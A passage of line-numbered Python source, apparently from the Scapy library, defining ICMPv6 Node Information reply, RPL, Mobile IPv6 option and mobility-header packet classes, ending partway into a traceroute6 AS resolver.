2585# all the DNS names. Internally it is kept ready to be sent 

2586# (undissected). i2repr() decode it for user. This is to 

2587# make build after dissection bijective. 

2588# 

2589# I also merged getfield() and m2i(), and addfield() and i2m(). 

2590 

2591 

2592class NIReplyDataField(StrField): 

2593 

2594 def i2h(self, pkt, x): 

2595 if x is None: 

2596 return x 

2597 t, val = x 

2598 if t == 2: 

2599 ttl, dnsnames = val 

2600 val = [ttl] + dnsrepr2names(dnsnames) 

2601 return val 

2602 

2603 def h2i(self, pkt, x): 

2604 qtype = 0 # We will decode it as string if not 

2605 # overridden through 'qtype' in pkt 

2606 

2607 # No user hint, let's use 'qtype' value for that purpose 

2608 if not isinstance(x, tuple): 

2609 if pkt is not None: 

2610 qtype = pkt.qtype 

2611 else: 

2612 qtype = x[0] 

2613 x = x[1] 

2614 

2615 # From that point on, x is the value (second element of the tuple) 

2616 

2617 if qtype == 2: # DNS name 

2618 if isinstance(x, (str, bytes)): # listify the string 

2619 x = [x] 

2620 if isinstance(x, list): 

2621 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 

2622 if x and isinstance(x[0], int): 

2623 ttl = x[0] 

2624 names = x[1:] 

2625 else: 

2626 ttl = 0 

2627 names = x 

2628 return (2, [ttl, names2dnsrepr(names)]) 

2629 

2630 elif qtype in [3, 4]: # IPv4 or IPv6 addr 

2631 if not isinstance(x, list): 

2632 x = [x] # User directly provided an IP, instead of list 

2633 

2634 def fixvalue(x): 

2635 # List elements are not tuples, user probably 

2636 # omitted ttl value : we will use 0 instead 

2637 if not isinstance(x, tuple): 

2638 x = (0, x) 

2639 # Decode bytes 

2640 if isinstance(x[1], bytes): 

2641 x = (x[0], x[1].decode()) 

2642 return x 

2643 

2644 return (qtype, [fixvalue(d) for d in x]) 

2645 

2646 return (qtype, x) 

2647 

2648 def addfield(self, pkt, s, val): 

2649 t, tmp = val 

2650 if tmp is None: 

2651 tmp = b"" 

2652 if t == 2: 

2653 ttl, dnsstr = tmp 

2654 return s + struct.pack("!I", ttl) + dnsstr 

2655 elif t == 3: 

2656 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501 

2657 elif t == 4: 

2658 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501 

2659 else: 

2660 return s + tmp 

2661 

2662 def getfield(self, pkt, s): 

2663 code = getattr(pkt, "code") 

2664 if code != 0: 

2665 return s, (0, b"") 

2666 

2667 qtype = getattr(pkt, "qtype") 

2668 if qtype == 0: # NOOP 

2669 return s, (0, b"") 

2670 

2671 elif qtype == 2: 

2672 if len(s) < 4: 

2673 return s, (0, b"") 

2674 ttl = struct.unpack("!I", s[:4])[0] 

2675 return b"", (2, [ttl, s[4:]]) 

2676 

2677 elif qtype == 3: # IPv6 addresses with TTLs 

2678 # XXX TODO : get the real length 

2679 res = [] 

2680 while len(s) >= 20: # 4 + 16 

2681 ttl = struct.unpack("!I", s[:4])[0] 

2682 ip = inet_ntop(socket.AF_INET6, s[4:20]) 

2683 res.append((ttl, ip)) 

2684 s = s[20:] 

2685 return s, (3, res) 

2686 

2687 elif qtype == 4: # IPv4 addresses with TTLs 

2688 # XXX TODO : get the real length 

2689 res = [] 

2690 while len(s) >= 8: # 4 + 4 

2691 ttl = struct.unpack("!I", s[:4])[0] 

2692 ip = inet_ntop(socket.AF_INET, s[4:8]) 

2693 res.append((ttl, ip)) 

2694 s = s[8:] 

2695 return s, (4, res) 

2696 else: 

2697 # XXX TODO : implement me and deal with real length 

2698 return b"", (0, s) 

2699 

2700 def i2repr(self, pkt, x): 

2701 if x is None: 

2702 return "[]" 

2703 

2704 if isinstance(x, tuple) and len(x) == 2: 

2705 t, val = x 

2706 if t == 2: # DNS names 

2707 ttl, tmp_len = val 

2708 tmp_len = dnsrepr2names(tmp_len) 

2709 names_list = (plain_str(name) for name in tmp_len) 

2710 return "ttl:%d %s" % (ttl, ",".join(names_list)) 

2711 elif t == 3 or t == 4: 

2712 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501 

2713 return repr(val) 

2714 return repr(x) # XXX should not happen 

2715 

2716# By default, sent responses have code set to 0 (successful) 

2717 

2718 

2719class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): 

2720 name = "ICMPv6 Node Information Reply - NOOP Reply" 

2721 fields_desc = [ByteEnumField("type", 140, icmp6types), 

2722 ByteEnumField("code", 0, _nireply_code), 

2723 XShortField("cksum", None), 

2724 ShortEnumField("qtype", 0, icmp6_niqtypes), 

2725 BitField("unused", 0, 10), 

2726 FlagsField("flags", 0, 6, "TACLSG"), 

2727 NonceField("nonce", None), 

2728 NIReplyDataField("data", None)] 

2729 

2730 

2731class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): 

2732 name = "ICMPv6 Node Information Reply - Node Names" 

2733 qtype = 2 

2734 

2735 

2736class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): 

2737 name = "ICMPv6 Node Information Reply - IPv6 addresses" 

2738 qtype = 3 

2739 

2740 

2741class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): 

2742 name = "ICMPv6 Node Information Reply - IPv4 addresses" 

2743 qtype = 4 

2744 

2745 

2746class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): 

2747 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" 

2748 code = 1 

2749 

2750 

2751class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): 

2752 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" 

2753 code = 2 

2754 

2755 

2756def _niquery_guesser(p): 

2757 cls = conf.raw_layer 

2758 type = orb(p[0]) 

2759 if type == 139: # Node Info Query specific stuff 

2760 if len(p) > 6: 

2761 qtype, = struct.unpack("!H", p[4:6]) 

2762 cls = {0: ICMPv6NIQueryNOOP, 

2763 2: ICMPv6NIQueryName, 

2764 3: ICMPv6NIQueryIPv6, 

2765 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer) 

2766 elif type == 140: # Node Info Reply specific stuff 

2767 code = orb(p[1]) 

2768 if code == 0: 

2769 if len(p) > 6: 

2770 qtype, = struct.unpack("!H", p[4:6]) 

2771 cls = {2: ICMPv6NIReplyName, 

2772 3: ICMPv6NIReplyIPv6, 

2773 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP) 

2774 elif code == 1: 

2775 cls = ICMPv6NIReplyRefuse 

2776 elif code == 2: 

2777 cls = ICMPv6NIReplyUnknown 

2778 return cls 

2779 

2780 

2781############################################################################# 

2782############################################################################# 

2783# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # 

2784############################################################################# 

2785############################################################################# 

2786 

2787# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes 

2788rplcodes = {0: "DIS", 

2789 1: "DIO", 

2790 2: "DAO", 

2791 3: "DAO-ACK", 

2792 # 4: "P2P-DRO", 

2793 # 5: "P2P-DRO-ACK", 

2794 # 6: "Measurement", 

2795 7: "DCO", 

2796 8: "DCO-ACK"} 

2797 

2798 

2799class ICMPv6RPL(_ICMPv6): # RFC 6550 

2800 name = 'RPL' 

2801 fields_desc = [ByteEnumField("type", 155, icmp6types), 

2802 ByteEnumField("code", 0, rplcodes), 

2803 XShortField("cksum", None)] 

2804 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} 

2805 

2806 

2807############################################################################# 

2808############################################################################# 

2809# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # 

2810############################################################################# 

2811############################################################################# 

2812 

2813# Mobile IPv6 ICMPv6 related classes 

2814 

2815class ICMPv6HAADRequest(_ICMPv6): 

2816 name = 'ICMPv6 Home Agent Address Discovery Request' 

2817 fields_desc = [ByteEnumField("type", 144, icmp6types), 

2818 ByteField("code", 0), 

2819 XShortField("cksum", None), 

2820 XShortField("id", None), 

2821 BitEnumField("R", 1, 1, {1: 'MR'}), 

2822 XBitField("res", 0, 15)] 

2823 

2824 def hashret(self): 

2825 return struct.pack("!H", self.id) + self.payload.hashret() 

2826 

2827 

2828class ICMPv6HAADReply(_ICMPv6): 

2829 name = 'ICMPv6 Home Agent Address Discovery Reply' 

2830 fields_desc = [ByteEnumField("type", 145, icmp6types), 

2831 ByteField("code", 0), 

2832 XShortField("cksum", None), 

2833 XShortField("id", None), 

2834 BitEnumField("R", 1, 1, {1: 'MR'}), 

2835 XBitField("res", 0, 15), 

2836 IP6ListField('addresses', None)] 

2837 

2838 def hashret(self): 

2839 return struct.pack("!H", self.id) + self.payload.hashret() 

2840 

2841 def answers(self, other): 

2842 if not isinstance(other, ICMPv6HAADRequest): 

2843 return 0 

2844 return self.id == other.id 

2845 

2846 

2847class ICMPv6MPSol(_ICMPv6): 

2848 name = 'ICMPv6 Mobile Prefix Solicitation' 

2849 fields_desc = [ByteEnumField("type", 146, icmp6types), 

2850 ByteField("code", 0), 

2851 XShortField("cksum", None), 

2852 XShortField("id", None), 

2853 XShortField("res", 0)] 

2854 

2855 def _hashret(self): 

2856 return struct.pack("!H", self.id) 

2857 

2858 

2859class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): 

2860 name = 'ICMPv6 Mobile Prefix Advertisement' 

2861 fields_desc = [ByteEnumField("type", 147, icmp6types), 

2862 ByteField("code", 0), 

2863 XShortField("cksum", None), 

2864 XShortField("id", None), 

2865 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}), 

2866 XBitField("res", 0, 14)] 

2867 

2868 def hashret(self): 

2869 return struct.pack("!H", self.id) 

2870 

2871 def answers(self, other): 

2872 return isinstance(other, ICMPv6MPSol) 

2873 

2874# Mobile IPv6 Options classes 

2875 

2876 

2877_mobopttypes = {2: "Binding Refresh Advice", 

2878 3: "Alternate Care-of Address", 

2879 4: "Nonce Indices", 

2880 5: "Binding Authorization Data", 

2881 6: "Mobile Network Prefix (RFC3963)", 

2882 7: "Link-Layer Address (RFC4068)", 

2883 8: "Mobile Node Identifier (RFC4283)", 

2884 9: "Mobility Message Authentication (RFC4285)", 

2885 10: "Replay Protection (RFC4285)", 

2886 11: "CGA Parameters Request (RFC4866)", 

2887 12: "CGA Parameters (RFC4866)", 

2888 13: "Signature (RFC4866)", 

2889 14: "Home Keygen Token (RFC4866)", 

2890 15: "Care-of Test Init (RFC4866)", 

2891 16: "Care-of Test (RFC4866)"} 

2892 

2893 

2894class _MIP6OptAlign(Packet): 

2895 """ Mobile IPv6 options have alignment requirements of the form x*n+y. 

2896 This class is inherited by all MIPv6 options to help in computing the 

2897 required Padding for that option, i.e. the need for a Pad1 or PadN 

2898 option before it. They only need to provide x and y as class 

2899 parameters. (x=0 and y=0 are used when no alignment is required)""" 

2900 

2901 __slots__ = ["x", "y"] 

2902 

2903 def alignment_delta(self, curpos): 

2904 x = self.x 

2905 y = self.y 

2906 if x == 0 and y == 0: 

2907 return 0 

2908 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

2909 return delta 

2910 

2911 def extract_padding(self, p): 

2912 return b"", p 

2913 

2914 

2915class MIP6OptBRAdvice(_MIP6OptAlign): 

2916 name = 'Mobile IPv6 Option - Binding Refresh Advice' 

2917 fields_desc = [ByteEnumField('otype', 2, _mobopttypes), 

2918 ByteField('olen', 2), 

2919 ShortField('rinter', 0)] 

2920 x = 2 

2921 y = 0 # alignment requirement: 2n 

2922 

2923 

2924class MIP6OptAltCoA(_MIP6OptAlign): 

2925 name = 'MIPv6 Option - Alternate Care-of Address' 

2926 fields_desc = [ByteEnumField('otype', 3, _mobopttypes), 

2927 ByteField('olen', 16), 

2928 IP6Field("acoa", "::")] 

2929 x = 8 

2930 y = 6 # alignment requirement: 8n+6 

2931 

2932 

2933class MIP6OptNonceIndices(_MIP6OptAlign): 

2934 name = 'MIPv6 Option - Nonce Indices' 

2935 fields_desc = [ByteEnumField('otype', 4, _mobopttypes), 

2936 ByteField('olen', 16), 

2937 ShortField('hni', 0), 

2938 ShortField('coni', 0)] 

2939 x = 2 

2940 y = 0 # alignment requirement: 2n 

2941 

2942 

2943class MIP6OptBindingAuthData(_MIP6OptAlign): 

2944 name = 'MIPv6 Option - Binding Authorization Data' 

2945 fields_desc = [ByteEnumField('otype', 5, _mobopttypes), 

2946 ByteField('olen', 16), 

2947 BitField('authenticator', 0, 96)] 

2948 x = 8 

2949 y = 2 # alignment requirement: 8n+2 

2950 

2951 

2952class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963 

2953 name = 'NEMO Option - Mobile Network Prefix' 

2954 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 

2955 ByteField("olen", 18), 

2956 ByteField("reserved", 0), 

2957 ByteField("plen", 64), 

2958 IP6Field("prefix", "::")] 

2959 x = 8 

2960 y = 4 # alignment requirement: 8n+4 

2961 

2962 

2963class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068 

2964 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" 

2965 fields_desc = [ByteEnumField("otype", 7, _mobopttypes), 

2966 ByteField("olen", 7), 

2967 ByteEnumField("ocode", 2, _rfc4068_lla_optcode), 

2968 ByteField("pad", 0), 

2969 MACField("lla", ETHER_ANY)] # Only support ethernet 

2970 x = 0 

2971 y = 0 # alignment requirement: none 

2972 

2973 

2974class MIP6OptMNID(_MIP6OptAlign): # RFC 4283 

2975 name = "MIPv6 Option - Mobile Node Identifier" 

2976 fields_desc = [ByteEnumField("otype", 8, _mobopttypes), 

2977 FieldLenField("olen", None, length_of="id", fmt="B", 

2978 adjust=lambda pkt, x: x + 1), 

2979 ByteEnumField("subtype", 1, {1: "NAI"}), 

2980 StrLenField("id", "", 

2981 length_from=lambda pkt: pkt.olen - 1)] 

2982 x = 0 

2983 y = 0 # alignment requirement: none 

2984 

2985# We only support decoding and basic build. Automatic HMAC computation is 

2986# too much work for our current needs. It is left to the user (I mean ... 

2987# you). --arno 

2988 

2989 

2990class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5) 

2991 name = "MIPv6 Option - Mobility Message Authentication" 

2992 fields_desc = [ByteEnumField("otype", 9, _mobopttypes), 

2993 FieldLenField("olen", None, length_of="authdata", fmt="B", 

2994 adjust=lambda pkt, x: x + 5), 

2995 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501 

2996 2: "MN-AAA authentication mobility option"}), # noqa: E501 

2997 IntField("mspi", None), 

2998 StrLenField("authdata", "A" * 12, 

2999 length_from=lambda pkt: pkt.olen - 5)] 

3000 x = 4 

3001 y = 1 # alignment requirement: 4n+1 

3002 

3003# Extracted from RFC 1305 (NTP) : 

3004# NTP timestamps are represented as a 64-bit unsigned fixed-point number, 

3005# in seconds relative to 0h on 1 January 1900. The integer part is in the 

3006# first 32 bits and the fraction part in the last 32 bits. 

3007 

3008 

3009class NTPTimestampField(LongField): 

3010 def i2repr(self, pkt, x): 

3011 if x < ((50 * 31536000) << 32): 

3012 return "Some date a few decades ago (%d)" % x 

3013 

3014 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to 

3015 # January 1st 1970 : 

3016 delta = -2209075761 

3017 i = int(x >> 32) 

3018 j = float(x & 0xffffffff) * 2.0**-32 

3019 res = i + j + delta 

3020 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) 

3021 

3022 return "%s (%d)" % (t, x) 

3023 

3024 

3025class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6) 

3026 name = "MIPv6 option - Replay Protection" 

3027 fields_desc = [ByteEnumField("otype", 10, _mobopttypes), 

3028 ByteField("olen", 8), 

3029 NTPTimestampField("timestamp", 0)] 

3030 x = 8 

3031 y = 2 # alignment requirement: 8n+2 

3032 

3033 

3034class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6) 

3035 name = "MIPv6 option - CGA Parameters Request" 

3036 fields_desc = [ByteEnumField("otype", 11, _mobopttypes), 

3037 ByteField("olen", 0)] 

3038 x = 0 

3039 y = 0 # alignment requirement: none 

3040 

3041# XXX TODO: deal with CGA param fragmentation and build of defragmented 

3042# XXX version. Passing of a big CGAParam structure should be 

3043# XXX simplified. Make it hold packets, by the way --arno 

3044 

3045 

3046class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1) 

3047 name = "MIPv6 option - CGA Parameters" 

3048 fields_desc = [ByteEnumField("otype", 12, _mobopttypes), 

3049 FieldLenField("olen", None, length_of="cgaparams", fmt="B"), 

3050 StrLenField("cgaparams", "", 

3051 length_from=lambda pkt: pkt.olen)] 

3052 x = 0 

3053 y = 0 # alignment requirement: none 

3054 

3055 

3056class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2) 

3057 name = "MIPv6 option - Signature" 

3058 fields_desc = [ByteEnumField("otype", 13, _mobopttypes), 

3059 FieldLenField("olen", None, length_of="sig", fmt="B"), 

3060 StrLenField("sig", "", 

3061 length_from=lambda pkt: pkt.olen)] 

3062 x = 0 

3063 y = 0 # alignment requirement: none 

3064 

3065 

3066class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3) 

3067 name = "MIPv6 option - Home Keygen Token" 

3068 fields_desc = [ByteEnumField("otype", 14, _mobopttypes), 

3069 FieldLenField("olen", None, length_of="hkt", fmt="B"), 

3070 StrLenField("hkt", "", 

3071 length_from=lambda pkt: pkt.olen)] 

3072 x = 0 

3073 y = 0 # alignment requirement: none 

3074 

3075 

3076class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4) 

3077 name = "MIPv6 option - Care-of Test Init" 

3078 fields_desc = [ByteEnumField("otype", 15, _mobopttypes), 

3079 ByteField("olen", 0)] 

3080 x = 0 

3081 y = 0 # alignment requirement: none 

3082 

3083 

3084class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5) 

3085 name = "MIPv6 option - Care-of Test" 

3086 fields_desc = [ByteEnumField("otype", 16, _mobopttypes), 

3087 FieldLenField("olen", None, length_of="cokt", fmt="B"), 

3088 StrLenField("cokt", b'\x00' * 8, 

3089 length_from=lambda pkt: pkt.olen)] 

3090 x = 0 

3091 y = 0 # alignment requirement: none 

3092 

3093 

3094class MIP6OptUnknown(_MIP6OptAlign): 

3095 name = 'Scapy6 - Unknown Mobility Option' 

3096 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 

3097 FieldLenField("olen", None, length_of="odata", fmt="B"), 

3098 StrLenField("odata", "", 

3099 length_from=lambda pkt: pkt.olen)] 

3100 x = 0 

3101 y = 0 # alignment requirement: none 

3102 

3103 @classmethod 

3104 def dispatch_hook(cls, _pkt=None, *_, **kargs): 

3105 if _pkt: 

3106 o = orb(_pkt[0]) # Option type 

3107 if o in moboptcls: 

3108 return moboptcls[o] 

3109 return cls 

3110 

3111 

3112moboptcls = {0: Pad1, 

3113 1: PadN, 

3114 2: MIP6OptBRAdvice, 

3115 3: MIP6OptAltCoA, 

3116 4: MIP6OptNonceIndices, 

3117 5: MIP6OptBindingAuthData, 

3118 6: MIP6OptMobNetPrefix, 

3119 7: MIP6OptLLAddr, 

3120 8: MIP6OptMNID, 

3121 9: MIP6OptMsgAuth, 

3122 10: MIP6OptReplayProtection, 

3123 11: MIP6OptCGAParamsReq, 

3124 12: MIP6OptCGAParams, 

3125 13: MIP6OptSignature, 

3126 14: MIP6OptHomeKeygenToken, 

3127 15: MIP6OptCareOfTestInit, 

3128 16: MIP6OptCareOfTest} 

3129 

3130 

3131# Main Mobile IPv6 Classes 

3132 

3133mhtypes = {0: 'BRR', 

3134 1: 'HoTI', 

3135 2: 'CoTI', 

3136 3: 'HoT', 

3137 4: 'CoT', 

3138 5: 'BU', 

3139 6: 'BA', 

3140 7: 'BE', 

3141 8: 'Fast BU', 

3142 9: 'Fast BA', 

3143 10: 'Fast NA'} 

3144 

3145# From http://www.iana.org/assignments/mobility-parameters 

3146bastatus = {0: 'Binding Update accepted', 

3147 1: 'Accepted but prefix discovery necessary', 

3148 128: 'Reason unspecified', 

3149 129: 'Administratively prohibited', 

3150 130: 'Insufficient resources', 

3151 131: 'Home registration not supported', 

3152 132: 'Not home subnet', 

3153 133: 'Not home agent for this mobile node', 

3154 134: 'Duplicate Address Detection failed', 

3155 135: 'Sequence number out of window', 

3156 136: 'Expired home nonce index', 

3157 137: 'Expired care-of nonce index', 

3158 138: 'Expired nonces', 

3159 139: 'Registration type change disallowed', 

3160 140: 'Mobile Router Operation not permitted', 

3161 141: 'Invalid Prefix', 

3162 142: 'Not Authorized for Prefix', 

3163 143: 'Forwarding Setup failed (prefixes missing)', 

3164 144: 'MIPV6-ID-MISMATCH', 

3165 145: 'MIPV6-MESG-ID-REQD', 

3166 146: 'MIPV6-AUTH-FAIL', 

3167 147: 'Permanent home keygen token unavailable', 

3168 148: 'CGA and signature verification failed', 

3169 149: 'Permanent home keygen token exists', 

3170 150: 'Non-null home nonce index expected'} 

3171 

3172 

3173class _MobilityHeader(Packet): 

3174 name = 'Dummy IPv6 Mobility Header' 

3175 overload_fields = {IPv6: {"nh": 135}} 

3176 

3177 def post_build(self, p, pay): 

3178 p += pay 

3179 tmp_len = self.len 

3180 if self.len is None: 

3181 tmp_len = (len(p) - 8) // 8 

3182 p = p[:1] + struct.pack("B", tmp_len) + p[2:] 

3183 if self.cksum is None: 

3184 cksum = in6_chksum(135, self.underlayer, p) 

3185 else: 

3186 cksum = self.cksum 

3187 p = p[:4] + struct.pack("!H", cksum) + p[6:] 

3188 return p 

3189 

3190 

3191class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg 

3192 name = "IPv6 Mobility Header - Generic Message" 

3193 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3194 ByteField("len", None), 

3195 ByteEnumField("mhtype", None, mhtypes), 

3196 ByteField("res", None), 

3197 XShortField("cksum", None), 

3198 StrLenField("msg", b"\x00" * 2, 

3199 length_from=lambda pkt: 8 * pkt.len - 6)] 

3200 

3201 

3202class MIP6MH_BRR(_MobilityHeader): 

3203 name = "IPv6 Mobility Header - Binding Refresh Request" 

3204 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3205 ByteField("len", None), 

3206 ByteEnumField("mhtype", 0, mhtypes), 

3207 ByteField("res", None), 

3208 XShortField("cksum", None), 

3209 ShortField("res2", None), 

3210 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3211 _OptionsField("options", [], MIP6OptUnknown, 8, 

3212 length_from=lambda pkt: 8 * pkt.len)] 

3213 overload_fields = {IPv6: {"nh": 135}} 

3214 

3215 def hashret(self): 

3216 # Hack: BRR, BU and BA have the same hashret that returns the same 

3217 # value b"\x00\x08\x09" (concatenation of mhtypes). This is 

3218 # because we need match BA with BU and BU with BRR. --arno 

3219 return b"\x00\x08\x09" 

3220 

3221 

3222class MIP6MH_HoTI(_MobilityHeader): 

3223 name = "IPv6 Mobility Header - Home Test Init" 

3224 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3225 ByteField("len", None), 

3226 ByteEnumField("mhtype", 1, mhtypes), 

3227 ByteField("res", None), 

3228 XShortField("cksum", None), 

3229 StrFixedLenField("reserved", b"\x00" * 2, 2), 

3230 StrFixedLenField("cookie", b"\x00" * 8, 8), 

3231 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3232 _OptionsField("options", [], MIP6OptUnknown, 16, 

3233 length_from=lambda pkt: 8 * (pkt.len - 1))] 

3234 overload_fields = {IPv6: {"nh": 135}} 

3235 

3236 def hashret(self): 

3237 return bytes_encode(self.cookie) 

3238 

3239 

3240class MIP6MH_CoTI(MIP6MH_HoTI): 

3241 name = "IPv6 Mobility Header - Care-of Test Init" 

3242 mhtype = 2 

3243 

3244 def hashret(self): 

3245 return bytes_encode(self.cookie) 

3246 

3247 

3248class MIP6MH_HoT(_MobilityHeader): 

3249 name = "IPv6 Mobility Header - Home Test" 

3250 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3251 ByteField("len", None), 

3252 ByteEnumField("mhtype", 3, mhtypes), 

3253 ByteField("res", None), 

3254 XShortField("cksum", None), 

3255 ShortField("index", None), 

3256 StrFixedLenField("cookie", b"\x00" * 8, 8), 

3257 StrFixedLenField("token", b"\x00" * 8, 8), 

3258 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3259 _OptionsField("options", [], MIP6OptUnknown, 24, 

3260 length_from=lambda pkt: 8 * (pkt.len - 2))] 

3261 overload_fields = {IPv6: {"nh": 135}} 

3262 

3263 def hashret(self): 

3264 return bytes_encode(self.cookie) 

3265 

3266 def answers(self, other): 

3267 if (isinstance(other, MIP6MH_HoTI) and 

3268 self.cookie == other.cookie): 

3269 return 1 

3270 return 0 

3271 

3272 

3273class MIP6MH_CoT(MIP6MH_HoT): 

3274 name = "IPv6 Mobility Header - Care-of Test" 

3275 mhtype = 4 

3276 

3277 def hashret(self): 

3278 return bytes_encode(self.cookie) 

3279 

3280 def answers(self, other): 

3281 if (isinstance(other, MIP6MH_CoTI) and 

3282 self.cookie == other.cookie): 

3283 return 1 

3284 return 0 

3285 

3286 

3287class LifetimeField(ShortField): 

3288 def i2repr(self, pkt, x): 

3289 return "%d sec" % (4 * x) 

3290 

3291 

3292class MIP6MH_BU(_MobilityHeader): 

3293 name = "IPv6 Mobility Header - Binding Update" 

3294 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3295 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3296 ByteEnumField("mhtype", 5, mhtypes), 

3297 ByteField("res", None), 

3298 XShortField("cksum", None), 

3299 XShortField("seq", None), # TODO: ShortNonceField 

3300 FlagsField("flags", "KHA", 7, "PRMKLHA"), 

3301 XBitField("reserved", 0, 9), 

3302 LifetimeField("mhtime", 3), # unit == 4 seconds 

3303 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3304 _OptionsField("options", [], MIP6OptUnknown, 12, 

3305 length_from=lambda pkt: 8 * pkt.len - 4)] 

3306 overload_fields = {IPv6: {"nh": 135}} 

3307 

3308 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 

3309 return b"\x00\x08\x09" 

3310 

3311 def answers(self, other): 

3312 if isinstance(other, MIP6MH_BRR): 

3313 return 1 

3314 return 0 

3315 

3316 

3317class MIP6MH_BA(_MobilityHeader): 

3318 name = "IPv6 Mobility Header - Binding ACK" 

3319 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3320 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3321 ByteEnumField("mhtype", 6, mhtypes), 

3322 ByteField("res", None), 

3323 XShortField("cksum", None), 

3324 ByteEnumField("status", 0, bastatus), 

3325 FlagsField("flags", "K", 3, "PRK"), 

3326 XBitField("res2", None, 5), 

3327 XShortField("seq", None), # TODO: ShortNonceField 

3328 XShortField("mhtime", 0), # unit == 4 seconds 

3329 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3330 _OptionsField("options", [], MIP6OptUnknown, 12, 

3331 length_from=lambda pkt: 8 * pkt.len - 4)] 

3332 overload_fields = {IPv6: {"nh": 135}} 

3333 

3334 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 

3335 return b"\x00\x08\x09" 

3336 

3337 def answers(self, other): 

3338 if (isinstance(other, MIP6MH_BU) and 

3339 other.mhtype == 5 and 

3340 self.mhtype == 6 and 

3341 other.flags & 0x1 and # Ack request flags is set 

3342 self.seq == other.seq): 

3343 return 1 

3344 return 0 

3345 

3346 

3347_bestatus = {1: 'Unknown binding for Home Address destination option', 

3348 2: 'Unrecognized MH Type value'} 

3349 

3350# TODO: match Binding Error to its stimulus 

3351 

3352 

3353class MIP6MH_BE(_MobilityHeader): 

3354 name = "IPv6 Mobility Header - Binding Error" 

3355 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3356 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3357 ByteEnumField("mhtype", 7, mhtypes), 

3358 ByteField("res", 0), 

3359 XShortField("cksum", None), 

3360 ByteEnumField("status", 0, _bestatus), 

3361 ByteField("reserved", 0), 

3362 IP6Field("ha", "::"), 

3363 _OptionsField("options", [], MIP6OptUnknown, 24, 

3364 length_from=lambda pkt: 8 * (pkt.len - 2))] 

3365 overload_fields = {IPv6: {"nh": 135}} 

3366 

3367 

3368_mip6_mhtype2cls = {0: MIP6MH_BRR, 

3369 1: MIP6MH_HoTI, 

3370 2: MIP6MH_CoTI, 

3371 3: MIP6MH_HoT, 

3372 4: MIP6MH_CoT, 

3373 5: MIP6MH_BU, 

3374 6: MIP6MH_BA, 

3375 7: MIP6MH_BE} 

3376 

3377 

3378############################################################################# 

3379############################################################################# 

3380# Traceroute6 # 

3381############################################################################# 

3382############################################################################# 

3383 

3384class AS_resolver6(AS_resolver_riswhois): 

3385 def _resolve_one(self, ip): 

3386 """ 

3387 overloaded version to provide a Whois resolution on the 

3388 embedded IPv4 address if the address is 6to4 or Teredo. 

3389 Otherwise, the native IPv6 address is passed. 

3390 """ 

3391 

3392 if in6_isaddr6to4(ip): # for 6to4, use embedded @ 

3393 tmp = inet_pton(socket.AF_INET6, ip) 

3394 addr = inet_ntop(socket.AF_INET, tmp[2:6]) 

3395 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address 

3396 addr = teredoAddrExtractInfo(ip)[2] 

3397 else: 

3398 addr = ip 

3399 

